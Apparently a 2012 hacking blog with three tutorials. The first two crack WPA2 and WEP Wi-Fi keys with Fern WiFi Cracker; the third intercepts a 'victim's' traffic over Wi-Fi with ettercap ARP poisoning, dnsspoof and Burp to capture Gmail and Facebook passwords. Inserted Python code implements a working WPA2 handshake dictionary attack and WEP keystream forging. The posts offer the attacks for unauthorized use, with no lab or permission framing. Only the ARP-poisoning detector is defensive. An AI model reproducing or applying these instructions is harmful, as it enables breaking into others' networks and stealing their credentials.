Wednesday, September 12, 2012

[TUT] WPA2 CCMP Cracking using Fern Wifi Cracker [TUT]


Hey guys!
The day before yesterday I made a tutorial on WEP cracking with a tool built into BackTrack called "Fern WiFi Cracker".

Today I'll show you how to recover a WPA2 (CCMP) pre-shared key with the same tool. Strictly speaking, what gets cracked is the WPA2-PSK passphrase, not the CCMP cipher: Fern captures the 4-way handshake and runs a dictionary attack against it, so it only succeeds if the passphrase is in your wordlist.


so now let us begin..

open fern wifi cracker...


select the wireless interface from the list.




When you select your card a small window pops up. Ignore it and just click OK.



Double-click anywhere on the tool to open the settings and enable the xterm option from there (the window that appeared above was just telling you about these "settings").





Now click the button with the WiFi logo on it; scanning starts as soon as you click it.


Now you'll see two xterms, one running the WEP scan and one the WPA scan (Fern is running airodump-ng underneath).

*In the pic I actually closed the xterm for WEP.





Now click the button that says "WPA". A window opens: pick the AP from the list and select a wordlist for the dictionary attack against the WPA2 (CCMP) handshake.
Then select, from the client list, the client you want to deauthenticate from the AP. The deauth is what forces that client to reconnect, and the reconnection is the 4-way handshake we need to capture. If no client is associated with the AP there is nothing to deauth and no handshake to catch; you have to wait for one to connect.

Now click "Attack".

After a few seconds (or minutes) you'll see one xterm appear that sniffs the AP (it is really just waiting for the WPA handshake) and another xterm pop up every 3-4 seconds (that one is sending the "Deauth" packets to kick the client off).





Once the handshake has been captured the tool starts the dictionary attack on its own, and if the passphrase is in the wordlist it is displayed in the window. If it isn't, nothing will be found no matter how long you wait: every candidate costs 4096 rounds of HMAC-SHA1 (the PBKDF2 step of WPA2-PSK), so a huge wordlist can take hours, and the only thing that decides success is whether the real passphrase is in it.
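To make clear what Fern (through aircrack-ng) is actually computing in that step, here is the dictionary attack written out as an added example. This is not code from the original post, from Fern or from aircrack-ng; the function names are mine, and the SSID, MAC addresses, nonces, passphrase, wordlist and the message-2 EAPOL frame are all constructed for the demo (the frame is built from the real passphrase to stand in for a sniffed capture). Only the protocol arithmetic is real: PBKDF2 to get the PMK, the 802.11 PRF to get the PTK, and HMAC-SHA1 over the EAPOL-Key frame for the MIC.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what make every wordlist candidate expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_384(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-384: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, 2."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3)
    )
    return out[:48]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (48 bytes = KCK | KEK | TK).  MACs and nonces go in as
    min || max so that the AP and the station derive the same key."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_384(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (AKM 00-0F-AC:2) Key MIC: HMAC-SHA1 over the whole EAPOL-Key frame with
    its 16-byte MIC field zeroed, truncated to 16 bytes.  The MIC field sits at
    offset 81 (4-byte 802.1X header + 77 bytes up to and including Key ID)."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    """The dictionary attack: derive PMK -> PTK -> KCK per candidate and accept the
    first one whose MIC over the captured frame matches.  Returns None if no hit."""
    captured_mic = eapol_frame[81:97]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def build_demo_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """Construct message 2 of the 4-way handshake (station -> AP, carries SNonce and
    a MIC) as a stand-in for a sniffed frame.  Constructed for this demo only."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: MIC set, pairwise, HMAC-SHA1 version
            + b"\x00\x10"                # key length: 16 (CCMP)
            + (1).to_bytes(8, "big")     # replay counter
            + snonce                     # key nonce (32 bytes)
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID
            + b"\x00" * 16               # key MIC, filled in below
            + b"\x00\x00")               # key data length: 0
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type EAPOL-Key
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


# --- constructed demo data (not from any real network) ---
SSID = "demo-net"
AP_MAC = bytes.fromhex("020000000001")      # locally administered addresses
STA_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "correct horse"
WORDLIST = ["password", "12345678", "correct horse", "letmein1"]
HANDSHAKE = build_demo_handshake(REAL_PASSPHRASE, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)


def run_demo():
    """Run the wordlist against the 'captured' handshake; expect 'correct horse'."""
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, HANDSHAKE, WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", run_demo())
```

Two things to take from this: the per-candidate cost is entirely in derive_pmk (4096 HMACs), which is why real tools precompute PMKs per SSID or push the work to GPUs, and nothing in the check depends on the data traffic; one message of the handshake with a valid MIC plus the two nonces and MACs is all a cracker ever needs.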




OK, that's it for WPA2-PSK (CCMP) cracking. I hope you liked it.


Monday, September 10, 2012

[TUT] WEP cracking using fern-wifi-cracker in bt5 r3 [TUT]


Hey guys...

Today I tried a new tool on BackTrack 5 R3. It's called "fern-wifi-cracker" and it's really good, so I thought I should make a tut on it.

so lets begin ...

go to backtrack --> exploitation tools --> wireless exploitation tools --> WLAN exploitation --> fern-wifi-cracker




Now select your wireless interface (it can be wlan0, wlan1, etc.).





Now there's a button with the WiFi logo on it; click that and it starts scanning for networks (of course it's running airodump-ng underneath).

*Note: if you double-click anywhere in the tool you'll get a "settings" dialog. You can fix the channel there and also start the xterm.





Now, if you look closely, the two buttons below the scan button get enabled: the first is the WEP cracking button and the second is for WPA cracking.

Click the button for WEP cracking.





After clicking it a new dialog opens. Pick the WEP network from the list and then choose the type of attack: ARP replay, chop-chop or fragmentation. ARP replay needs an associated client whose ARP packets can be replayed to make the AP generate fresh traffic; chop-chop and fragmentation instead recover RC4 keystream from captured packets, so the tool can forge and inject its own ARP requests without knowing the key. Then click "Attack".

You'll see the number of IVs increasing. There's a progress bar at the bottom of the dialog; when it reaches the end the tool starts aircrack-ng on the captured IVs to recover the key. Aircrack-ng's PTW attack needs tens of thousands of unique IVs, so the more data packets the chosen attack can generate, the quicker this goes.

When the key is recovered it's shown at the bottom of the dialog.
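To see why chop-chop and fragmentation can forge packets without ever learning the key, here is a small added example. It is not code from the original post, from Fern or from aircrack-ng; the WEP key, IV, the "captured" ARP frame and the function names are constructed for the demo. The only things taken from the real protocol are its layout: RC4 keyed with IV || key, a CRC-32 ICV appended to the plaintext, and the fixed 8-byte LLC/SNAP header that every ARP frame on a WEP network starts with.

```python
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: IV || key-id byte || RC4(IV || key) XOR (payload || CRC-32 ICV)."""
    plaintext = payload + zlib.crc32(payload).to_bytes(4, "little")
    ks = rc4(iv + wep_key, len(plaintext))
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(plaintext, ks))


def wep_decrypt(wep_key: bytes, body: bytes):
    """What the AP does: decrypt, check the ICV, return the payload or None."""
    iv, ct = body[:3], body[4:]
    pt = bytes(c ^ k for c, k in zip(ct, rc4(iv + wep_key, len(ct))))
    payload, icv = pt[:-4], pt[-4:]
    return payload if zlib.crc32(payload).to_bytes(4, "little") == icv else None


# Every ARP frame starts with this LLC/SNAP header, so its first 8 plaintext
# bytes are known to anyone sniffing, key or no key.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


def recover_keystream(body: bytes, known_plaintext: bytes) -> bytes:
    """Attacker side: ciphertext XOR known plaintext = keystream for this IV."""
    ct = body[4:4 + len(known_plaintext)]
    return bytes(c ^ p for c, p in zip(ct, known_plaintext))


def forge_fragment(iv: bytes, keystream: bytes, data: bytes) -> bytes:
    """Encrypt attacker-chosen data under the same IV with the recovered keystream.
    8 keystream bytes buy 4 bytes of data + 4-byte ICV, exactly the per-fragment
    budget the fragmentation attack bootstraps from."""
    pt = data + zlib.crc32(data).to_bytes(4, "little")
    if len(pt) > len(keystream):
        raise ValueError("not enough keystream recovered for this payload")
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(pt, keystream))


# --- constructed demo data ---
WEP_KEY = bytes.fromhex("0123456789")    # 40-bit key; the attacker never learns it
IV = bytes.fromhex("a1b2c3")
ARP_FRAME = LLC_SNAP_ARP + bytes(28)      # known header + zeroed ARP body
CAPTURED = wep_encrypt(WEP_KEY, IV, ARP_FRAME)


def run_demo():
    """Sniff one ARP frame, recover 8 keystream bytes, inject a forged fragment
    and show the AP accepts it (ICV valid) although we never touched the key."""
    ks = recover_keystream(CAPTURED, LLC_SNAP_ARP)
    forged = forge_fragment(IV, ks, b"\xde\xad\xbe\xef")
    return wep_decrypt(WEP_KEY, forged)


if __name__ == "__main__":
    print("AP decrypted the forged fragment as:", run_demo())
```

The whole weakness is in the last three lines of run_demo: the AP cannot tell a forged fragment from a genuine one, because WEP reuses the keystream for a given IV and the ICV is an unkeyed CRC. Chaining such fragments (the real attack sends up to 16 per frame) yields a full 1500-byte keystream, which is then used to inject ARP requests until enough IVs have been collected for aircrack-ng.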

NOW COMES THE INTERESTING PART:
(before going further, I suggest you connect to the internet for this)

Go to "Toolbox" --> Geolocatory Tracker.

Enter the BSSID of the AP in the text box and click "Trace".

I think everyone has already guessed what it will show...

YES... INDEED... IT WILL SHOW YOU THE LOCATION OF THE AP ON GOOGLE MAPS, coordinates included. That's why you need an internet connection: the tool looks the BSSID up in an online WiFi geolocation service, so what you get is where that BSSID was last recorded, and a BSSID nobody has ever submitted returns nothing.

Also in the toolbox there's a button for cookie hijacking called "Cookie Hijacker".

OK guys, so that's it for now :-)

PM me if you need any help with this :)

Friday, June 29, 2012

WIRELESS MITM ATTACK (INTERCEPTING THE DATA)


In this tutorial I'll show you how to intercept the victim's data while they are communicating.

But before we get started there are certain requirements:

1)     BackTrack 5 R2 (I'm using R2; if you have R1 that's no problem) :-)
2)     A connection to the victim's wireless network


TOOLS USED IN THE PROCESS:

1)  Ettercap
2)  Burp Suite

For those who haven't cracked the victim's wireless password yet, I suggest you first read the cracking tutorial and then this one.
I can suggest some good tools for wireless cracking:

1)  aircrack-ng suite
2)  Gerix Wifi Cracker
3)  Airoscript

ALL THREE ARE INCLUDED IN BACKTRACK 5 R2


SO LETS GET STARTED !!



STEP 1

We have to edit ettercap's config file before starting ettercap. Why? Not for sniffing as such (ettercap sniffs on wlan0 fine with the default config) but because the iptables "redir_command" lines are commented out by default, and without them ettercap cannot redirect the victim's SSL (port 443) connections through its own port for the SSL man-in-the-middle. To edit the file, open a terminal and type:
vim /etc/etter.conf

Now keep scrolling down until you find this block (the "$" at the end of each line is just vim showing that the line runs past the edge of the screen; it is not part of the file):
#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rp$
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %r$

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRE$
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIR$


Change it to this, i.e. remove the leading "#" from the two iptables lines only (the ipchains lines stay commented out):

#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rp$
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %r$

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRE$
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIR$


While you are in the file, also look at the [privs] section near the top and set both ec_uid and ec_gid to 0. By default ettercap drops its privileges right after start-up, and an unprivileged ettercap cannot run those iptables commands, so the redirect would silently do nothing.

Save & close it.



STEP 2
(If you already know how to do a normal MITM then skip this step.)
Start ettercap.



Go to SNIFF --> UNIFIED SNIFFING



Select the network interface ---> wlan0 --> OK



(wlan0 is my wireless interface; check yours and use that.)


HOSTS --> SCAN FOR HOSTS


HOSTS --> HOSTS LIST


        Select the victim's IP and click "ADD TO TARGET 1", then select the gateway's IP and click "ADD TO TARGET 2". (If you leave one target group empty ettercap poisons every host in the list, which is noisier and far more likely to break the network.)



        
MITM --> ARP POISONING ---> tick "SNIFF REMOTE CONNECTIONS" --> OK

MITM --> ICMP REDIRECT --> under GATEWAY INFORMATION enter the real gateway's MAC ADDRESS and IP ADDRESS (not your own: ettercap sends ICMP redirects spoofed from that gateway telling the hosts that you are the better route) --> OK. This step is optional; ARP poisoning alone is normally enough on a wireless LAN.





START --> START SNIFFING



To check if the ARP poisoning is successful:



PLUGINS --> MANAGE THE PLUGINS --> chk_poison

If the poisoning is successful, move on;
otherwise try disconnecting and reconnecting, or restart ettercap.
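chk_poison tells you from the attacker's side whether the poisoning took. Here is the same thing seen from the network's side, as an added example that is not code from the original post or from ettercap: the ARP traffic this attack produces is internally inconsistent, and a few lines of Python over a plain "tcpdump -n arp" capture are enough to flag it. The log lines, addresses and function names below are constructed for the demo; the last four reply lines imitate what a poisoning host emits, unsolicited replies repeated every few seconds that claim both the gateway's IP and the victim's IP with one MAC.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style output (tcpdump -n -i wlan0 arp); not a real capture.
ARP_LOG = """\
12:00:01.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28
12:00:01.000500 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:01.001000 ARP, Reply 192.168.1.20 is-at aa:bb:cc:dd:ee:ff, length 28
12:00:31.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:40.000000 ARP, Reply 192.168.1.1 is-at 02:00:00:00:00:aa, length 28
12:00:40.000100 ARP, Reply 192.168.1.20 is-at 02:00:00:00:00:aa, length 28
12:00:50.000000 ARP, Reply 192.168.1.1 is-at 02:00:00:00:00:aa, length 28
12:00:50.000100 ARP, Reply 192.168.1.20 is-at 02:00:00:00:00:aa, length 28
"""
GATEWAY_IP = "192.168.1.1"   # assumed: the default gateway of the LAN being watched

ARP_REPLY = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_arp_replies(log_text):
    """Yield (ip, mac) for every ARP reply in tcpdump -n output; requests are ignored."""
    for line in log_text.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_poisoning(records, gateway_ip):
    """Flag the two fingerprints ettercap-style poisoning leaves in ARP traffic:
    1. an IP whose MAC changes while we are watching;
    2. one MAC that claims the gateway's IP and some other host's IP at once
       (the attacker sits between victim and gateway, impersonating each to the other).
    Returns a list of alert strings in the order the evidence appeared."""
    last_mac = {}
    ips_per_mac = defaultdict(set)
    alerts = []
    for ip, mac in records:
        if ip in last_mac and last_mac[ip] != mac:
            alerts.append(f"{ip} changed from {last_mac[ip]} to {mac}")
        last_mac[ip] = mac
        ips_per_mac[mac].add(ip)
    for mac, ips in ips_per_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            others = ", ".join(sorted(ips - {gateway_ip}))
            alerts.append(f"{mac} claims gateway {gateway_ip} and {others}")
    return alerts


def run_demo():
    """Run the detector over the constructed log; expect three alerts."""
    return detect_arp_poisoning(parse_arp_replies(ARP_LOG), GATEWAY_IP)


if __name__ == "__main__":
    for alert in run_demo():
        print("ALERT:", alert)
```

The first kind of alert (an IP's MAC changing) also fires on legitimate events such as a DHCP lease moving to a new device, so on its own it is only a hint; the second kind, one MAC answering for both the gateway and a client, is what a two-target ettercap session necessarily produces and is the one worth paging on.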

STEP 3 (OPTIONAL)

If you also want to spoof DNS at the same time, type:


 dnsspoof -i wlan0 > /root/Desktop/dns.txt 


(dnsspoof comes from the dsniff package. With no -f hosts file it answers every DNS query it sees with your own IP address, so the victim's browser is sent to your machine for every hostname. The redirect only logs the queries it spoofed to dns.txt in /root/Desktop/.)


FINAL STEP


Start Burp Suite:

BACKTRACK --> VULNERABILITY ASSESSMENT --> WEB APPLICATION ASSESSMENT --> WEB APPLICATION PROXIES --> BURPSUITE




Go to PROXY --> OPTIONS
Now add listeners for port 80 (HTTP) and 443 (HTTPS). Two things are easy to miss here: the listeners must bind to your wireless interface (not only loopback) with "support invisible proxying" enabled, because the victim's browser is not configured to use a proxy; and the victim's traffic for ports 80 and 443 has to be redirected into those listeners with nat PREROUTING REDIRECT rules on wlan0, otherwise it is simply forwarded on to the real server and Burp never sees it.




Go to PROXY --> INTERCEPT (click ON) :-)


NOW WHEN THE VICTIM SURFS THE INTERNET, ALL THEIR REQUESTS WILL BE FORWARDED
THROUGH YOU :-)

NOTE: after intercepting the data and sniffing the password of Gmail, Facebook, etc., ALWAYS REMEMBER TO CLICK "FORWARD", otherwise the victim
will not be able to surf, i.e. their browser will just keep loading... :D
Also remember that for HTTPS sites Burp presents its own certificate, which the victim's browser does not trust, so they will see a certificate warning on every HTTPS site unless they click through it.

HAVE FUN !!